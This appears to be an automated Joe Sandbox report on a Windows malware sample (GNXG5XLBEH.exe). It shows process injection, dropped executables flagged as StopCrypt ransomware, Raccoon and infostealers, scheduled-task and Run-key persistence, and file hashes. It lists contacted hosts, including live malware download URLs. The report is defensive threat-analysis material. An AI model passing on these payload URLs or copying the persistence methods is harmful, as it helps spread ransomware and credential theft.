                      [Process chain shown in the graph: GNXG5XLBEH.exe starts a child GNXG5XLBEH.exe, which injects into explorer.exe; explorer.exe drops ttfssdi, D9EC.exe, 8058.exe and 14 other malicious files and starts 6BA5.exe, 77CC.exe, 6B9B.exe and 3 other processes; 77CC.exe drops evjgtzc.exe and starts cmd.exe (twice), sc.exe and 3 other processes, each with a conhost.exe; 6B9B.exe starts a second 6B9B.exe; evjgtzc.exe starts svchost.exe; ttfssdi restarts itself; WerFault.exe is also started.]
                      [Network contacts shown in the graph: 86.107.197.138 (ports 38133, 49902; MOD-EUNL, Romania), yahoo.com, 185.233.81.115 (port 443; SUPERSERVERSDATACENTERRU, Russian Federation), 188.166.28.199 (port 80; DIGITALOCEAN-ASNUS, Netherlands), microsoft-com.mail.protection.outlook.com 52.101.24.0 (port 25; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States), patmushta.info 94.142.143.116 (port 443; IHOR-ASRU, Russian Federation), 127.0.0.1, plus 10 and 11 other IPs or domains from the root process and explorer.exe respectively.]

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label | Link
GNXG5XLBEH.exe | 36% | Virustotal | | Browse
GNXG5XLBEH.exe | 100% | Joe Sandbox ML | |

                      Dropped Files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\8058.exe | 100% | Avira | HEUR/AGEN.1211353 |
C:\Users\user\AppData\Local\Temp\evjgtzc.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
C:\Users\user\AppData\Local\Temp\4955.exe | 100% | Avira | HEUR/AGEN.1212012 |
C:\Users\user\AppData\Local\Temp\13C.exe | 100% | Avira | HEUR/AGEN.1212012 |
C:\Users\user\AppData\Local\Temp\8058.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\ttfssdi | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\74DE.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\2205.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\5BBC.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\77CC.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\evjgtzc.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\1523.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\6E36.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\D9EC.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\6B9B.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\6BA5.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\6471.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\54D0.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\2D8F.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\2205.exe | 34% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\2205.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt |
C:\Users\user\AppData\Local\Temp\2D8F.exe | 50% | ReversingLabs | Win32.Infostealer.Generic |
C:\Users\user\AppData\Local\Temp\5BBC.exe | 46% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\5BBC.exe | 77% | ReversingLabs | Win32.Trojan.Raccoon |

                      Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
26.0.6B9B.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
43.2.evjgtzc.exe.600e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
31.2.8058.exe.d00000.0.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
26.0.6B9B.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
26.0.6B9B.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
31.0.8058.exe.d00000.3.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
23.2.6B9B.exe.6415a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
26.0.6B9B.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
28.2.6BA5.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
21.2.5BBC.exe.6e0e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
21.2.5BBC.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
31.0.8058.exe.d00000.1.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
19.0.ttfssdi.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
26.0.6B9B.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
45.2.svchost.exe.2ee0000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
30.3.77CC.exe.2190000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
21.0.5BBC.exe.6e0e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.0.ttfssdi.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
30.2.77CC.exe.2170e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
31.0.8058.exe.d00000.2.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
26.1.6B9B.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.1.ttfssdi.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
43.3.evjgtzc.exe.620000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
1.0.GNXG5XLBEH.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
26.0.6B9B.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244 | | Download File
1.0.GNXG5XLBEH.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.0.ttfssdi.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
21.0.5BBC.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
1.0.GNXG5XLBEH.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
28.2.6BA5.exe.7d0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
26.2.6B9B.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
43.2.evjgtzc.exe.660000.2.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
21.0.5BBC.exe.6e0e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
30.2.77CC.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
28.3.6BA5.exe.7f0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen | | Download File
21.3.5BBC.exe.6f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
18.2.ttfssdi.6015a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
1.1.GNXG5XLBEH.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
1.2.GNXG5XLBEH.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
21.0.5BBC.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
19.2.ttfssdi.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
0.2.GNXG5XLBEH.exe.6d15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File
31.0.8058.exe.d00000.0.unpack | 100% | Avira | HEUR/AGEN.1211353 | | Download File
43.2.evjgtzc.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen | | Download File
26.0.6B9B.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label | Link
http://81.163.30.181/l2.exe | 100% | Avira URL Cloud | malware |
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware |
http://host-data-coin-11.com/ | 0% | URL Reputation | safe |
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 17% | Virustotal | | Browse
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 100% | Avira URL Cloud | malware |
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe |
https://api.ip.sb/ip | 0% | URL Reputation | safe |
http://unicupload.top/install5.exe | 100% | URL Reputation | phishing |
http://crl.ver) | 0% | Avira URL Cloud | safe |
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | 100% | Avira URL Cloud | malware |
https://activity.windows.comr | 0% | URL Reputation | safe |
https://%s.xboxlive.com | 0% | URL Reputation | safe |
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | 100% | Avira URL Cloud | malware |
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware |
https://dynamic.t | 0% | URL Reputation | safe |
http://81.163.30.181/l3.exe | 100% | Avira URL Cloud | malware |
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe |

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dl.uploadgram.me | 176.9.247.226 | true | false | | high
patmushta.info | 94.142.143.116 | true | false | | high
cdn.discordapp.com | 162.159.134.233 | true | false | | high
ipwhois.app | 136.243.172.101 | true | false | | high
unicupload.top | 54.38.220.85 | true | false | | high
host-data-coin-11.com | 8.209.70.0 | true | false | | high
mta5.am0.yahoodns.net | 98.136.96.91 | true | false | | high
c9d0e790b353537889bd47a364f5acff43c11f248.xyz | 185.112.83.97 | true | false | | high
privacy-tools-for-you-780.com | 8.209.70.0 | true | false | | high
microsoft-com.mail.protection.outlook.com | 52.101.24.0 | true | false | | high
goo.su | 172.67.139.105 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
data-host-coin-8.com | 8.209.70.0 | true | false | | high
api.ip.sb | unknown | unknown | false | | high
yahoo.com | unknown | unknown | false | | high

                                                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://81.163.30.181/l2.exe | true | Avira URL Cloud: malware | unknown
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://host-data-coin-11.com/ | false | URL Reputation: safe | unknown
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | true | 17%, Virustotal, Browse; Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://81.163.30.181/l3.exe | true | Avira URL Cloud: malware | unknown

                                                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | false | | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 0000000A.00000003.305093646.0000024F15C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306261450.0000024F15C4E000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 0000000A.00000003.305414851.0000024F15C41000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306242274.0000024F15C42000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 0000000A.00000003.305414851.0000024F15C41000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306242274.0000024F15C42000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmp | false | | high
http://www.bingmapsportal.com | svchost.exe, 0000000A.00000002.306093914.0000024F15C13000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp | false | | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | false | | high
https://api.ip.sb/ip | 8058.exe, 0000001F.00000002.423233100.0000000004011000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 0000000A.00000003.305386938.0000024F15C45000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 0000000A.00000003.305055330.0000024F15C68000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306331852.0000024F15C6A000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000006.00000002.567765167.000002717EE5F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmp | false | | high
https://activity.windows.comr | svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 0000000A.00000002.306220372.0000024F15C3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306093914.0000024F15C13000.00000004.00000001.sdmp | false | | high
https://%s.xboxlive.com | svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000A.00000003.305093646.0000024F15C49000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.306261450.0000024F15C4E000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | false | | high
https://dynamic.t | svchost.exe, 0000000A.00000003.305350891.0000024F15C40000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | false | | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe, 0000000A.00000002.306201615.0000024F15C3B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.283252304.0000024F15C32000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | false | | high
https://activity.windows.com | svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe, 0000000A.00000003.305202115.0000024F15C61000.00000004.00000001.sdmp | false | | high
https://%s.dnet.xboxlive.com | svchost.exe, 00000008.00000002.534310561.0000024008A3E000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/ | svchost.exe, 0000000A.00000002.306281153.0000024F15C5C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | false | | high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe, 0000000A.00000003.305266972.0000024F15C5A000.00000004.00000001.sdmp | false | | high

                                                                                                                        Contacted IPs


Public

IP               Domain                                      Country             ASN     ASN Name                                          Malicious
94.142.143.116   patmushta.info                              Russian Federation  35196   IHOR-ASRU                                         false
188.166.28.199   unknown                                     Netherlands         14061   DIGITALOCEAN-ASNUS                                true
172.67.139.105   goo.su                                      United States       13335   CLOUDFLARENETUS                                   false
86.107.197.138   unknown                                     Romania             39855   MOD-EUNL                                          false
8.209.70.0       host-data-coin-11.com                       Singapore           45102   CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC  false
54.38.220.85     unicupload.top                              France              16276   OVHFR                                             false
52.101.24.0      microsoft-com.mail.protection.outlook.com   United States       8075    MICROSOFT-CORP-MSN-AS-BLOCKUS                     false
144.76.136.153   transfer.sh                                 Germany             24940   HETZNER-ASDE                                      false
81.163.30.181    unknown                                     Russian Federation  58303   IR-RASANAPISHTAZIR                                false
185.233.81.115   unknown                                     Russian Federation  50113   SUPERSERVERSDATACENTERRU                          true
185.7.214.171    unknown                                     France              42652   DELUNETDE                                         true
185.186.142.166  unknown                                     Russian Federation  204490  ASKONTELRU                                        true
162.159.134.233  cdn.discordapp.com                          United States       13335   CLOUDFLARENETUS                                   false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553366
Start date: 14.01.2022
Start time: 19:07:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 55s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: GNXG5XLBEH.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 48
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@58/62@102/15
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 38.1% (good quality ratio 25.6%)
• Quality average: 51.8%
• Quality standard deviation: 41.2%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• TCP Packets have been reduced to 100
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 23.35.236.56, 80.67.82.211, 80.67.82.235, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 52.182.143.212, 104.26.12.31, 104.26.13.31, 172.67.75.172
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ctldl.windowsupdate.com, iplogger.org, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; report is missing behavior information
• Report creation exceeded maximum time and may have missing behavior and disassembly information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing network information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time      Type             Description
19:08:35  API Interceptor  3x Sleep call for process: svchost.exe modified
19:09:09  Task Scheduler   Run new task: Firefox Default Browser Agent B475E6AC46161B97 path: C:\Users\user\AppData\Roaming\ttfssdi
19:09:26  API Interceptor  1x Sleep call for process: 6BA5.exe modified
19:09:45  API Interceptor  1x Sleep call for process: WerFault.exe modified
19:10:08  API Interceptor  1x Sleep call for process: explorer.exe modified
19:10:47  Task Scheduler   Run new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
19:10:47  Autostart        Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RegHost C:\Users\user\AppData\Roaming\Microsoft\RegHost.exe

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

                                                                                                                        No context

                                                                                                                        Domains

                                                                                                                        No context

                                                                                                                        ASN

                                                                                                                        No context

                                                                                                                        JA3 Fingerprints

                                                                                                                        No context

                                                                                                                        Dropped Files

                                                                                                                        No context

                                                                                                                        Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: MPEG-4 LOAS
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.2486023385576548
Encrypted: false
SSDEEP: 1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4V:BJiRdwfu2SRU4V
MD5: 32D17CCD2B6339DF019EBB675E860FAF
SHA1: 9797760F17F157597E26E0060638986E6653A7F9
SHA-256: 4FA5B39006989138CDF98AE11DD5855CF9909200A2AC8666B1CB6BB45B949A0F
SHA-512: B922ACC6838D46E0D3E7D4895C6451828A122450CC7BC6FC98880FA25807A3B7A486F57970E77AAB2E513BA80B12ECCC753FEA9020C81093DE4BF0954D4A702B
Malicious: false
Reputation: unknown
                                                                                                                        Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x57ece8f3, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 786432
Entropy (8bit): 0.25069143755463874
Encrypted: false
SSDEEP: 384:s+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:zSB2nSB2RSjlK/+mLesOj1J2
MD5: F7E6A2DE3097C7FFE9639C74B6A26D82
SHA1: D158073CE723A78BDBC831702D34FAA27FEA317A
SHA-256: 6C65A26815CE80E9E63CA682743B45BB40FE45C91DE0C225865CE390D2C16B7B
SHA-512: DC20BD49475F3778501D018B892C1D9F7C3F01CD5A1FF5B289D1C4B264011C536747BEFD743B61868B670B800956F2C6D7A18301F4520A422E8E8F0CD672D3B1
Malicious: false
Reputation: unknown
                                                                                                                        Preview: W...... ................e.f.3...w........................&..........w..#....z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................}.#....z.....................o#....z..........................................................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07710005765895223
Encrypted: false
SSDEEP: 3:faG1EvGU3TJl/bJdAtiVvmf4/All3Vkttlmlnl:FQGiTJt4bf4A3
MD5: 4C83DD7FB6BC1F021316190F961B5B91
SHA1: 1B42B2D8F7EC7E5CB77888C6057447D07C427B03
SHA-256: 9E9A916A5E9AA99FACADC3DB55432377A47B40608C3DFD87819FCCA77FFBB86B
SHA-512: EE335F572DD2D1B46AD21437F987263683EA96489A3F2F0D548761FC4EDC13FA1ED933455E7459F28AE54C56E2B4452CEF08A01AB1CB16611CF2106132D47E75
Malicious: false
Reputation: unknown
                                                                                                                        Preview: .Qk......................................3...w..#....z.......w...............w.......w....:O.....w.....................o#....z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5BBC.exe_362029c6c23990d576b7266aec72f8f83ce9e419_c52cd5fe_0e289cc1\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8116740932612948
Encrypted: false
SSDEEP: 96:J3Fs18LHzErOQoJ7R3V6tpXIQcQec6tycEfcw3++HbHg/8BRTf3o8Fa9iVfOyWYV:Ja4Hzf8HQ0lzjIq/u7sXS274ItH
MD5: 424949616D212EF0F10948818A1A9A93
SHA1: 5A7114CD9918ACCCDE826C09676AC83B761A6756
SHA-256: 15964ACF293606ACCA72747608CB3B0E5A1C1DDD56F25D416D51331E4C8F1530
SHA-512: 071C070AA2CF180648F3FC89CBE6D660D45C99BAE79ADF8AE40160BC10BD3779EDC5AE45D76C3D2B5E962B62607D64BC7BBC5C3158D964295636DEB706A48D16
Malicious: false
Reputation: unknown
